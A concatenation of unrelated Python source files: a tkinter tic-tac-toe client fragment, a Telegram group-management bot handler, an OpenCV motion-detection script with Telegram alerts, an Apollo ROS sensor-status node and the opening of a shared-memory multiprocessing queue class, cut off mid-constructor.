self.draw_win_loose_label() self.block_playboard() try: self.client = Client(self) except Exception as e: print('While trying to init Client() ->', e) self.connection_failed() # closing all connections and threads on WINDOW CLOSE GUI.root.protocol("WM_DELETE_WINDOW", lambda: on_closing_playgame(self)) def connection_failed(self): print('Server refused connection') P.main_menu_click() def stop_thread_and_go_to_MainMenu(self): try: self.client.rT._delete() self.exit = True time.sleep(0.1) self.client.s.close() print(f'is Thread alive? -> {self.client.rT.is_alive()}') # del self.client except Exception as e: print('When try to delete Thread an error occured -> ', e) print('disconnected') P.main_menu_click() def draw_BACK_TO_MAIN_MENU_button(self): self.btn_main_menu = MyButton(GUI.SCREEN, text='Back to Main Menu', style='KEKOS.TButton', command=lambda: self.stop_thread_and_go_to_MainMenu() ) self.btn_main_menu.place(relx=0.5, y=self.GAME_HEIGHT - (self.GAME_HEIGHT - self.play_board_size) / 4, height=50, width=300, anchor='center' ) self.btn_main_menu.bind("<Enter>", self.on_enter) self.btn_main_menu.bind("<Leave>", self.on_leave) # events for BACK TO MAIN MENU BUTOON def on_enter(self, e): self.btn_main_menu._btn.config(style='Enter.TButton') self.btn_main_menu.update() def on_leave(self, e): self.btn_main_menu._btn.config(style='Leave.TButton') self.btn_main_menu.update() def draw_X_O(self, btn): if self.me['symbol'] is 'X': self.btn_dict[btn].config(text='X') if self.me['symbol'] is 'O': self.btn_dict[btn].config(text='O') self.block_playboard() self.update_status(6) self.client.response(self.me, btn) def draw_win_loose_label(self): self.l = tk.Label(GUI.SCREEN, font=('Helvetica', 20, 'bold'), fg='green') self.l.place(y=self.container.winfo_y() / 2, relx=0.5, anchor=tk.CENTER, width=self.container.winfo_width(), height=self.GAME_HEIGHT*0.15, ) self.l.update() def update_status(self, status): if status == 1: self.l.config(text='WAITING FOR PLAYERS...', fg='green') if status == 2: self.l.config(text='Your turn!', fg='green') if status == 3: self.l.config(text='YOU LOOSE :(', fg='red') if status == 4: self.l.config(text='!!! YOU WIN !!!', fg='green') if status == 5: self.l.config(text='DRAW', fg='green') if status == 6: self.l.config(text='Opponent`s turn', fg='green') if status == 7: self.l.config(text='Opponent left the game :(', fg='red') def update_all_buttons(self): for btn in self.btn_dict.keys(): self.btn_dict[btn].config(bg='SystemButtonFace') def block_playboard(self): self.container.config(bg='black') self.container.update() self.update_all_buttons() for btn in self.btn_dict.keys(): self.btn_dict[btn].config(command=lambda: ()) def unblock_playboard(self, buttons_to_block): self.container.config(bg='green') self.container.update() self.update_all_buttons() if buttons_to_block['btn_1'] is '': self.btn_dict['btn_1'].config(command=lambda: self.draw_X_O('btn_1')) if buttons_to_block['btn_2'] is '': self.btn_dict['btn_2'].config(command=lambda: self.draw_X_O('btn_2')) if buttons_to_block['btn_3'] is '': self.btn_dict['btn_3'].config(command=lambda: self.draw_X_O('btn_3')) if buttons_to_block['btn_4'] is '': self.btn_dict['btn_4'].config(command=lambda: self.draw_X_O('btn_4')) if buttons_to_block['btn_5'] is '': self.btn_dict['btn_5'].config(command=lambda: self.draw_X_O('btn_5')) if buttons_to_block['btn_6'] is '': self.btn_dict['btn_6'].config(command=lambda: self.draw_X_O('btn_6')) if buttons_to_block['btn_7'] is '': self.btn_dict['btn_7'].config(command=lambda: self.draw_X_O('btn_7')) if buttons_to_block['btn_8'] is '': self.btn_dict['btn_8'].config(command=lambda: self.draw_X_O('btn_8')) if buttons_to_block['btn_9'] is '': self.btn_dict['btn_9'].config(command=lambda: self.draw_X_O('btn_9')) def redraw_playboard(self, playboard): for btn in self.btn_dict: if playboard[btn] is not '': self.btn_dict[btn].config(text=playboard[btn]) # defined all win combos def highlight_win_combo(self, combo, color): combo = int(combo) if combo == 1: self.btn_dict['btn_1'].config(fg=color) self.btn_dict['btn_2'].config(fg=color) self.btn_dict['btn_3'].config(fg=color) if combo == 2: self.btn_dict['btn_4'].config(fg=color) self.btn_dict['btn_5'].config(fg=color) self.btn_dict['btn_6'].config(fg=color) if combo == 3: self.btn_dict['btn_7'].config(fg=color) self.btn_dict['btn_8'].config(fg=color) self.btn_dict['btn_9'].config(fg=color) if combo == 4: self.btn_dict['btn_1'].config(fg=color) self.btn_dict['btn_4'].config(fg=color) self.btn_dict['btn_7'].config(fg=color) if combo == 5: self.btn_dict['btn_2'].config(fg=color) self.btn_dict['btn_5'].config(fg=color) self.btn_dict['btn_8'].config(fg=color) if combo == 6: self.btn_dict['btn_3'].config(fg=color) self.btn_dict['btn_6'].config(fg=color) self.btn_dict['btn_9'].config(fg=color) if combo == 7: self.btn_dict['btn_1'].config(fg=color) self.btn_dict['btn_5'].config(fg=color) self.btn_dict['btn_9'].config(fg=color) if combo == 8: self.btn_dict['btn_3'].config(fg=color) self.btn_dict['btn_5'].config(fg=color) self.btn_dict['btn_7'].config(fg=color) def __del__(self): del self print('Client instance deleted!') # apply this actions "on closing" tkinter window def on_closing_playgame(obj): try: obj.exit = True print('closing window') # stop connection + obj.exit=True => break "while True" in Thread try: obj.client.s.close() except Exception as e: print('while trying to CLOSE CONNECTION: ', e) print('disconnected') raise SystemExit(0) except Exception as e: print(f'while closing from STATE_PLAY_GAME: {e}') raise SystemExit(0)
msg.py
from utlis.rank import setrank ,isrank ,remrank ,setsudos ,remsudos ,setsudo,IDrank,GPranks from utlis.send import send_msg, BYusers, sendM,Glang,GetLink from handlers.delete import delete from utlis.tg import Bot, Ckuser from handlers.ranks import ranks from handlers.locks import locks from handlers.gpcmd import gpcmd from handlers.sudo import sudo from handlers.all import allGP from utlis.tg import Bot,Del24 from config import * from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton import threading, requests, time, random, re , json,datetime,importlib def updateHandlers(client, message,redis): if redis.get("{}Nbot:bigM".format(BOT_ID)): return False type = message.chat.type try: userID = message.from_user.id chatID = message.chat.id except Exception as e: return 0 c = importlib.import_module("lang.arcmd") r = importlib.import_module("lang.arreply") if (type is "supergroup" or type is "group") and message.outgoing != True: userID = message.from_user.id chatID = message.chat.id rank = isrank(redis,userID,chatID) group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID) text = message.text title = message.chat.title if text and group is False: if (rank is "sudo" or rank is "sudos" or rank is "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID,chatID) == "creator"): if text == c.add: if redis.get("{}Nbot:autoaddbotN".format(BOT_ID)): auN = int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID))) else: auN = 1 if auN >= Bot("getChatMembersCount",{"chat_id":chatID})["result"] and not (rank is "sudo" or rank is "sudos"): Bot("sendMessage",{"chat_id":chatID,"text":r.Toolow.format((int(redis.get("{}Nbot:autoaddbotN".format(BOT_ID))) or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"}) return False GetME = Bot("getChatMember",{"chat_id":chatID,"user_id":BOT_ID})["result"] if (not GetME["can_change_info"] or not GetME["can_delete_messages"] or not GetME["can_invite_users"] or not GetME["can_restrict_members"] or not GetME["can_pin_messages"] or not GetME["can_promote_members"]): Bot("sendMessage",{"chat_id":chatID,"text":r.GiveMEall,"reply_to_message_id":message.message_id,"parse_mode":"html"}) return False if text == c.add and not redis.sismember("{}Nbot:disabledgroups".format(BOT_ID),chatID) and Ckuser(message): locksarray = {'Llink','Llongtext','Lmarkdown','Linline','Lfiles','Lcontact','Lbots','Lfwd','Lnote'} for lock in locksarray: redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID) ads = Bot("getChatAdministrators",{"chat_id":chatID}) for ad in ads['result']: userId = ad["user"]["id"] userFn = ad["user"]["first_name"] if ad['status'] == "administrator" and int(userId) != int(BOT_ID): setrank(redis,"admin",userId,chatID,"array") if ad['status'] == "creator": setrank(redis,"malk",userId,chatID,"one") add = redis.sadd("{}Nbot:groups".format(BOT_ID),chatID) Bot("exportChatInviteLink",{"chat_id":chatID}) kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/src_top")]]) Bot("sendMessage",{"chat_id":chatID,"text":r.doneadd.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb}) sendTO = (redis.get("{}Nbot:sudogp".format(BOT_ID)) or SUDO) get = (redis.hget("{}Nbot:links".format(BOT_ID),chatID) or GetLink(chatID) or "https://t.me/src_top") kb = InlineKeyboardMarkup([[InlineKeyboardButton("الرابط 🖇", url=get)]]) BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,message.from_user.first_name) Bot("sendMessage",{"chat_id":sendTO,"text":f"تم تفعيل مجموعه جديدة ℹ️\nاسم المجموعه : {title}\nايدي المجموعه : {chatID}\nالمنشئ : {BY}\n⎯ ⎯ ⎯ ⎯","parse_mode":"html","reply_markup":kb}) elif text == c.add and redis.sismember("{}Nbot:disabledgroups".format(BOT_ID),chatID) and Ckuser(message): redis.sadd("{}Nbot:groups".format(BOT_ID),chatID) redis.srem("{}Nbot:disabledgroups".format(BOT_ID),chatID) redis.hdel("{}Nbot:disabledgroupsTIME".format(BOT_ID),chatID) Bot("sendMessage",{"chat_id":chatID,"text":r.doneadd2.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"}) if text == c.disabl and Ckuser(message): Bot("sendMessage",{"chat_id":chatID,"text":r.disabled.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"}) if text and group is True: if (rank is "sudo" or rank is "sudos" or rank is "asudo") or (redis.get("{}Nbot:autoaddbot".format(BOT_ID)) and GPranks(userID,chatID) == "creator"): if text == c.add and Ckuser(message): Bot("sendMessage",{"chat_id":chatID,"text":r.doneadded.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown"}) if text == c.disabl and Ckuser(message): redis.srem("{}Nbot:groups".format(BOT_ID),chatID) redis.sadd("{}Nbot:disabledgroups".format(BOT_ID),chatID) NextDay_Date = datetime.datetime.today() + datetime.timedelta(days=1) redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),chatID,str(NextDay_Date)) kb = InlineKeyboardMarkup([[InlineKeyboardButton(r.MoreInfo, url="t.me/src_top")]]) Bot("sendMessage",{"chat_id":chatID,"text":r.disabl.format(title),"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb}) if group is True: t = threading.Thread(target=allGP,args=(client, message,redis)) t.daemon = True t.start() if text and group is True: if redis.sismember("{}Nbot:publicOrders".format(BOT_ID),chatID): x = redis.smembers("{}Nbot:{}:TXPoeders".format(BOT_ID,chatID)) for x in x: try: x = x.split("=") if re.search(f"^\{x[0]}$", text) or re.search(f"^\{x[0]} (.*)$", text): text = text.replace(x[0], x[1]) except Exception as e: print(e) message.text = text x = redis.smembers("{}Nbot:{}:TXoeders".format(BOT_ID,chatID)) for x in x: try: x = x.split("=") if re.search(f"^\{x[0]}$", text) or re.search(f"^\{x[0]} (.*)$", text): text = text.replace(x[0], x[1]) except Exception as e: print(e) message.text = text if (rank is "sudo" or rank is "sudos" or rank is "asudo") and group is True: t = threading.Thread(target=sudo,args=(client, message,redis)) t.daemon = True t.start() if text and (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner") and group is True: t = threading.Thread(target=ranks,args=(client, message,redis)) t.daemon = True t.start() if text and (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner" or rank is "admin") and group is True and re.search(c.startlock,text): if Ckuser(message): t = threading.Thread(target=locks,args=(client, message,redis)) t.daemon = True t.start() if (rank is False or rank is 0) and group is True: t = threading.Thread(target=delete,args=(client, message,redis)) t.daemon = True t.start() if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner" or rank is "admin") and group is True: t = threading.Thread(target=gpcmd,args=(client, message,redis)) t.daemon = True t.start() if type is "private" and message.outgoing != True: text = message.text rank = isrank(redis,userID,chatID) if (rank is "sudo" or rank is "asudo" or rank is "sudos"): t = threading.Thread(target=sudo,args=(client, message,redis)) t.daemon = True t.start() if text and re.search("^/start$",text): userID = message.from_user.id userFN = message.from_user.first_name redis.sadd("{}Nbot:privates".format(BOT_ID),userID) if rank == "sudo": kb = ReplyKeyboardMarkup([[r.RKgp, r.RKgpl],[r.RKaf, r.RKrf],[r.RKf],["جلب نسخه احتياطيه"],[r.RKub]],resize_keyboard=True) Bot("sendMessage",{"chat_id":chatID,"text":r.sudostart,"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":kb}) return 0 getbot = client.get_me() kb = InlineKeyboardMarkup([[InlineKeyboardButton("TshakeTeam", url="t.me/src_top")]]) Bot("sendMessage",{"chat_id":chatID,"text":r.botstart.format(getbot.first_name,getbot.username),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":kb}) if text and re.search("^/start (.*)$",text): tx = text.replace("/start ","") split = tx.split("=") order = split[0] if order == "showreplylistBOT": chatId = split[1] userId = split[2] TY = split[3] rank = isrank(redis,userId,chatId) if (rank == "sudo" or rank is "asudo" or rank == "sudos"): li = redis.hkeys("{}Nbot:{}".format(BOT_ID,TY)) if li: i = 1 words = "" for word in li: words = words+"\n"+str(i)+" - {"+word+"}" i += 1 if len(words) > 3000: Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"}) words = '' Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"}) reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R,callback_data=json.dumps(["del{}".format(TY+'BOT'),"",userID])),]]) Bot("sendMessage",{"chat_id":chatID,"text":r.DelallR,"reply_to_message_id":message.message_id,"disable_web_page_preview":True,"reply_markup":reply_markup}) if order == "showreplylist": chatId = split[1] userId = split[2] TY = split[3] group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatId) rank = isrank(redis,userId,chatId) if (rank is not False or rank is not 0 or rank != "vip" or rank != "admin") and group is True: li = redis.hkeys("{}Nbot:{}:{}".format(BOT_ID,chatId,TY)) if li: i = 1 words = "" for word in li: words = words+"\n"+str(i)+" - {"+word+"}" i += 1 if len(words) > 3000: Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"}) words = '' Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"}) reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2R,callback_data=json.dumps(["del{}".format(TY),chatId,userID])),]]) Bot("sendMessage",{"chat_id":chatID,"text":r.DelallR,"reply_to_message_id":message.message_id,"disable_web_page_preview":True,"reply_markup":reply_markup}) if order == "showBlocklist": chatId = split[1] userId = split[2] TY = split[3] group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatId) rank = isrank(redis,userId,chatId) if (rank is not False or rank is not 0 or rank != "vip") and group is True: redis.hset("{}Nbot:{}:TXreplys".format(BOT_ID,chatID),tx,text) li = redis.smembers("{}Nbot:{}:{}".format(BOT_ID,chatId,TY)) if li: i = 1 words = "" for ID in li: reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Blocklistone,callback_data=json.dumps(["delfromb",TY,userID,chatId])),]]) if TY == "blockanimations": Bot("sendAnimation",{"chat_id":userId,"animation":ID,"reply_markup":reply_markup}) if TY == "blockSTICKERs": Bot("sendSticker",{"chat_id":userId,"sticker":ID,"reply_markup":reply_markup}) if TY == "blockphotos": Bot("sendPhoto",{"chat_id":userId,"photo":ID,"reply_markup":reply_markup}) if TY == "blockTEXTs": words = words+"\n"+str(i)+" - {"+ID+"}" i += 1 print(len(words)) if len(words) > 3000: Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"}) words = '' if TY == "blockTEXTs": Bot("sendMessage",{"chat_id":userId,"text":words,"reply_to_message_id":message.message_id,"parse_mode":"html"}) reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.Delall2,callback_data=json.dumps(["delBL",TY,userID,chatId])),]]) Bot("sendMessage",{"chat_id":userId,"text":r.Delall,"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup}) else: Bot("sendMessage",{"chat_id":userId,"text":r.listempty2,"reply_to_message_id":message.message_id,"parse_mode":"html"})
Main.py
import cv2 from Camera import Camera from MovimentDetection import MovimentDetection from ObjectDetection import ObjectDetection from FaceDetection import FaceDetection from TimerProcess import TimerProcess from TelegramBot import TelegramBot import Rectangles from threading import Thread import time def showFrame(frame): cv2.imshow('camera frame', frame) def waitKeyPress(): return cv2.waitKey(1) def selectRectangleForMinArea(frame): global movimentDetection rect = cv2.selectROI(frame) area = Rectangles.calculateArea(rect) movimentDetection.objectMinArea = area cv2.destroyAllWindows() def recognizeMovingObjects(frame, objectNames): global movimentDetection global objectDetection gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) objects, rectangles = movimentDetection.getMovimentObjects(gray) detectedMovingObjects = [] if (rectangles): biggestRect = Rectangles.getBiggest(rectangles) expandedRectangle = Rectangles.expand(biggestRect, 100) objectImage = Rectangles.getImage(expandedRectangle, frame) detectedObjects = objectDetection.detect(objectImage) for detectedObject in detectedObjects: label, rect, id = detectedObject if (label in objectNames): detectedMovingObjects.append((label, expandedRectangle, id)) return detectedMovingObjects def detectObjects(frame): global objectDetection detectedObjects = objectDetection.detect(frame) for detectedObject in detectedObjects: label, rect, id = detectedObject Rectangles.draw([rect], frame) cv2.putText(frame, label, (rect[0], rect[1] + 20), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 1) def detectFaces(frame): global faceDetection detectedFaces = faceDetection.detect(frame) for detectedFace in detectedFaces: objectImage = Rectangles.getImage(detectedFace, frame) Rectangles.draw([detectedFace], frame) cv2.imshow("detected face", objectImage) def addDataToTimer(data): global timerProcess if (timerProcess == None): timerProcess = TimerProcess(5) timerProcess.addData(data) def checkMovingObjects(data): global idleTimerProcess labels = [x[0] for x in data] distinctLabels = list(set(labels)) for label in distinctLabels: labelsImgs = [x[2] for x in data if x[0] == label] if (len(labelsImgs) > 20): biggestImg = Rectangles.getBiggestImage(labelsImgs) cv2.imwrite("sendimage.jpg", biggestImg) telegramBot.sendPhoto(telegramChatId, "sendimage.jpg") idleTimerProcess = TimerProcess(15) # for img in labelsImgs: # cv2.imshow("biggest image", img) # cv2.waitKey(0) # cv2.imwrite("images/image" + str(labelsImgs.index(img)) + ".jpg", img) #biggestImg = Rectangles.getBiggestImage(labelsImgs) def main(): global idleTimerProcess global timerProcess camera = Camera(cameraInput) camera.openVideo() while(True): frame = camera.getFrame() frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5) if (idleTimerProcess == None): objects = recognizeMovingObjects( frame, ["person", "car", "dog", "cat", "sheep"]) for object in objects: label, rect, classId = object objectImg = Rectangles.getImage(rect, frame) addDataToTimer([label, rect, objectImg]) elif (idleTimerProcess.isClosed()): idleTimerProcess = None if (timerProcess != None and timerProcess.isClosed()): timerData = timerProcess.getData() timerProcess = None # checkMovingObjects(timerData) thread = Thread(target=checkMovingObjects, args=(timerData, )) thread.start() showFrame(frame) pressedKey = waitKeyPress() if pressedKey == ord('q'): break if pressedKey == ord('s'): selectRectangleForMinArea(frame) if pressedKey == ord('p'): rect = cv2.selectROI(frame) cv2.destroyAllWindows() objectImage = Rectangles.getImage(rect, frame) cv2.imwrite('image.jpg', objectImage) cv2.destroyAllWindows() telegramToken = "TELEGRAM-TOKEN" telegramChatId = 0 # Id do chat do telegram cameraInput = "rtsp://{user}:{password}@{ip}}/live/mpeg4" movimentDetection = MovimentDetection() movimentDetection.objectMinArea = 2500 movimentDetection.start() objectDetection = ObjectDetection() faceDetection = FaceDetection() timerProcess = None telegramBot = TelegramBot(telegramToken) idleTimerProcess = None if __name__ == '__main__': main()
main.py
#!/usr/bin/env python ############################################################################### # Copyright 2017 The Apollo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### """ This module publishes the car control message. """ import rospy import threading import math from sensor_msgs.msg import Image from std_msgs.msg import Bool from car_msgs.msg import ABS, PX2 from novatel_msgs.msg import BESTPOS, INSPVA, Alignment g_image_msg = Image() g_can_msg = ABS() g_rtk_msg = BESTPOS() g_ins_msg = INSPVA() g_alig_msg = Alignment() g_est_msg = PX2() g_act_msg = PX2() def est_callback(data): global g_est_msg g_est_msg = data def act_callback(data): global g_act_msg g_act_msg = data def image_callback(data): global g_image_msg g_image_msg = data def rtk_callback(data): global g_rtk_msg g_rtk_msg = data def ins_callback(data): global g_ins_msg g_ins_msg = data def alig_callback(data): global g_alig_msg g_alig_msg = data def can_callback(data): global g_can_msg g_can_msg = data def check_msg(time): now = rospy.Time.now() t = abs((now - time).to_sec()) rospy.loginfo("diff " + str(t) + " now " + str(now) + " msg " + str(time)) if t > 2: return False else: return True def work(): global g_image_msg global g_can_msg global g_rtk_msg global g_alig_msg global g_ins_msg global g_est_msg global g_act_msg r = rospy.Rate(1) while not rospy.is_shutdown(): rospy.loginfo("check image") ret = check_msg(g_image_msg.header.stamp) if not ret: image_status_pub.publish(False) else: image_status_pub.publish(True) rospy.loginfo("check can") ret = check_msg(g_can_msg.header.stamp) if not ret: can_status_pub.publish(False) else: can_status_pub.publish(True) rospy.loginfo("check est") ret = check_msg(g_est_msg.header.stamp) if not ret: est_status_pub.publish(False) else: est_status_pub.publish(True) rospy.loginfo("check act") ret = check_msg(g_act_msg.header.stamp) if not ret: act_status_pub.publish(False) else: act_status_pub.publish(True) rospy.loginfo("check alig") ret = check_msg(g_alig_msg.header.stamp) if not ret: rtk_status_pub.publish(False) else: if g_rtk_msg.position_type != 48 and g_rtk_msg.position_type != 50 and g_rtk_msg.position_type != 56: rtk_status_pub.publish(False) else: rtk_status_pub.publish(True) if g_ins_msg.insstatus != 3: ins_status_pub.publish(False) else: ins_status_pub.publish(True) r.sleep() rospy.init_node('data_check', anonymous=True) image_sub = rospy.Subscriber( '/car_msgs/image', Image, image_callback, queue_size=1, buff_size=1024 * 1024 * 16) can_sub = rospy.Subscriber( '/car_msgs/ABS', ABS, can_callback, queue_size=1, buff_size=1024 * 1024 * 16) rtk_sub = rospy.Subscriber( '/novatel_data/bestpos', BESTPOS, rtk_callback, queue_size=1, buff_size=1024 * 1024 * 16) ins_sub = rospy.Subscriber( '/novatel_data/inspva', INSPVA, ins_callback, queue_size=1, buff_size=1024 * 1024 * 16) alig_sub = rospy.Subscriber( '/novatel_data/align', Alignment, alig_callback, queue_size=1, buff_size=1024 * 1024 * 16) est_sub = rospy.Subscriber( '/car_msgs/estimate_px2', PX2, est_callback, queue_size=1, buff_size=1024 * 1024 * 16) act_sub = rospy.Subscriber( '/car_msgs/PX2', PX2, act_callback, queue_size=1, buff_size=1024 * 1024 * 16) image_status_pub = rospy.Publisher('/system_info/image', Bool, queue_size=1) rtk_status_pub = rospy.Publisher('/system_info/rtk', Bool, queue_size=1) ins_status_pub = rospy.Publisher('/system_info/ins', Bool, queue_size=1) can_status_pub = rospy.Publisher('/system_info/can', Bool, queue_size=1) act_status_pub = rospy.Publisher('/system_info/act', Bool, queue_size=1) est_status_pub = rospy.Publisher('/system_info/est', Bool, queue_size=1) th = threading.Thread(target=work) th.setDaemon(True) th.start() rospy.spin()
queue.py
import copy import multiprocessing as mp import multiprocessing.queues as mpq from queue import Full, Empty import pickle import math # import uuid import os import struct import sys import time import typing import dill # type: ignore import zlib if sys.version_info >= (3, 8): from multiprocessing.shared_memory import SharedMemory __all__ = ['ShmQueue'] else: from typing import TypeVar SharedMemory = TypeVar('SharedMemory') __all__ = [] class ShmQueue(mpq.Queue): """ShmQueue depends on shared memory instead of pipe to efficiently exchange data among processes. Shared memory is "System V style" memory blocks which can be shared and accessed directly by processes. This implementation is based on `multiprocessing.shared_memory.SharedMemory` hence requires Python >= 3.8. Its interface is almost identical to `multiprocessing.queue <https://docs.python.org/3.8/library/multiprocessing.html#multiprocessing.Queue>`_. But it allows one to specify the serializer, which by default is pickle. This implementation maintains two lists: a free buffer list, and a ready message list. The list heads for both lists are stored in a single shared memory area. The free buffer list is linked by the next_block_id field in each shared buffer's metadata area. Messages are built out of chunks. Each chunk occupies a single buffer. Each chunk contains a pointer (an integer identifier) to the next chunk's buffer using the next_chunk_block_id field in the shared buffer's metadata area. The list of ready messages links the first chunk of each ready message using the next_block_id field in the shared buffer's metadata area. Messages are serialized for transfer from the sender to the receiver. The serialized size of a message may not exceed the chunk size times the maximum queue size. If the deadlock_immanent_check is enabled (which is True by default), a ValueError will be raised on an attempt to put a message that is too large. Args: chunk_size (int, optional): Size of each chunk. By default, it is `ShmQueue.DEFAULT_CHUNK_SIZE` (1*1024*1024). \ If it is 0, it will be set to `ShmQueue.MAX_CHUNK_SIZE` (512*1024*1024). maxsize (int, optional): Maximum queue size, e.g. the maximum number of chunks available to a queue. \ If it is 0 (default), it will be set to `ShmQueue.DEFAULT_MAXSIZE` (2). serializer (obj, optional): Serializer to serialize and deserialize data. \ If it is None (default), pickle will be used. \ The serializer should implement `loads(bytes data) -> object` \ and `dumps(object obj) -> bytes`. integrity_check (bool, optional): When True, perform certain integrity checks on messages. 1) After serializing a message, immediately deserialize it to check for validity. 2) Save the length of a message after serialization. 3) Compute a checksum of each chunk of the message. 4) Include the total message size and chunk checksum in the metadata for each chunk. 5) When pulling a chunk from the queue, verify the chunk checksum. 6) After reassembling a message out of chunks, verify the total message size. deadlock_check (bool, optional): When fetching a writable block, print a message if two or more loops are needed to get a free block. (default is False) deadlock_immanent_check (bool, optional): Raise a ValueError if a message submitted to put(...) is too large to process. (Default is True) watermark_check (bool, optional): When true, prit a mesage with the largest message size so far in chunks. use_semaphores (bool, optional): When true, use semaphores to control access to the free list and the message list. The system will sleep when accessing these shared resources, instead of entering a polling loop. Note: - `close` needs to be invoked once to release memory and avoid a memory leak. - `qsize`, `empty` and `full` are implemented but may block. - Each shared queue consumes one shared memory area for the shared list heads and one shared memory area for each shared buffer. The underlying code in multiprocessing.shared_memory.SharedMemory consumes one process file descriptor for each shared memory area. There is a limit on the number of file descriptors that a process may have open. - Thus, there is a tradeoff between the chunk_size and maxsize: smaller chunks use memory more effectively with some overhead cost, but may run into the limit on the number of open file descriptors to process large messages and avoid blocking. Larger chunks waste unused space, but are less likely to run into the open file descriptor limit or to block waiting for a free buffer. Example:: def run(q): e = q.get() print(e) if __name__ == '__main__': q = ShmQueue(chunk_size=1024 * 4, maxsize=10) p = Process(target=run, args=(q,)) p.start() q.put(100) p.join() q.close() """ MAX_CHUNK_SIZE: int = 512 * 1024 * 1024 """int: The maximum allowable size for a buffer chunk. 512MB should be a large enough value.""" DEFAULT_CHUNK_SIZE: int = 1 * 1024 * 1024 """int: The default size for a buffer chunk.""" DEFAULT_MAXSIZE: int = 2 """int: The default maximum size for a queue.""" RESERVED_BLOCK_ID: int = 0xffffffff """int: RESERVED_BLOCK_ID is stored in the list head pointer and next chunk block id fields to indicate that thee is no next block. This value is intended to simplify debugging by removing stale next-block values. It is not used to test for blok chain termination; counters are used for that purpose, instead.""" META_STRUCT: typing.Mapping[str, typing.Tuple[int, int, str]] = { 'msg_id': (0, 12, '12s'), 'msg_size': (12, 16, 'I'), 'chunk_id': (16, 20, 'I'), 'total_chunks': (20, 24, 'I'), 'total_msg_size': (24, 28, 'I'), 'checksum': (28, 32, 'I'), 'src_pid': (32, 36, 'I'), 'next_chunk_block_id': (36, 40, 'I'), 'next_block_id': (40, 44, 'I') } """The per-buffer metadata structure parameters for struct.pack(...) and struct.unpack(...).""" META_BLOCK_SIZE: int = 44 """int: The length of the buffer metadata structure in bytes.""" LIST_HEAD_STRUCT: typing.Mapping[str, typing.Tuple[int, int, str]] = { 'first_block': (0, 4, 'I'), 'last_block': (4, 8, 'I'), 'block_count': (8, 12, 'I') } """The list head structure parameters for struct.pack(...) and struct.unpack(...). The list header structure maintains a block count in addition to first_block and last_block pointers.""" LIST_HEAD_SIZE: int = 12 """int: The length of a list head structure in bytes.""" FREE_LIST_HEAD: int = 0 """int: The index of the free buffer list head in the SharedMemory segment for sharing message queue list heads between processes.""" MSG_LIST_HEAD: int = 1 """int: The index of the queued message list head in the SharedMemory segment for sharing message queue list heads between processes.""" qid_counter: int = 0 """int: Each message queue has a queue ID (qid) that identifies the queue for debugging messages. This mutable class counter is used to create new queue ID values for newly-created queue. Implicitly, this assumes that message queues will be created by a single initialization process, then distributed to worker process. If shared message queues will be created by multiple processes, then the queue ID should be altered to incorporate the process ID (pid) of the process that created the shared message queue, or an additional field should be created and presented with the shared message queue's creator's pid..""" def __init__(self, chunk_size: int=DEFAULT_CHUNK_SIZE, maxsize: int=DEFAULT_MAXSIZE, serializer=None, integrity_check: bool=False, deadlock_check: bool=False, deadlock_immanent_check: bool=True, watermark_check: bool = False, use_semaphores: bool = True, verbose: bool=False): ctx = mp.get_context() # TODO: What is the proper type hint here? super().__init__(maxsize, ctx=ctx) self.qid: int = self.__class__.qid_counter self.__class__.qid_counter += 1 self.verbose: bool = verbose if self.verbose: print("Starting ShmQueue qid=%d pid=%d chunk_size=%d maxsize=%d." % (self.qid, os.getpid(), chunk_size, maxsize), file=sys.stderr, flush=True) # *** self.chunk_size: int = min(chunk_size, self.__class__.MAX_CHUNK_SIZE) \ if chunk_size > 0 else self.__class__.MAX_CHUNK_SIZE self.maxsize: int = maxsize if maxsize > 0 else self.__class__.DEFAULT_MAXSIZE self.serializer = serializer or pickle self.integrity_check: bool = integrity_check self.deadlock_check: 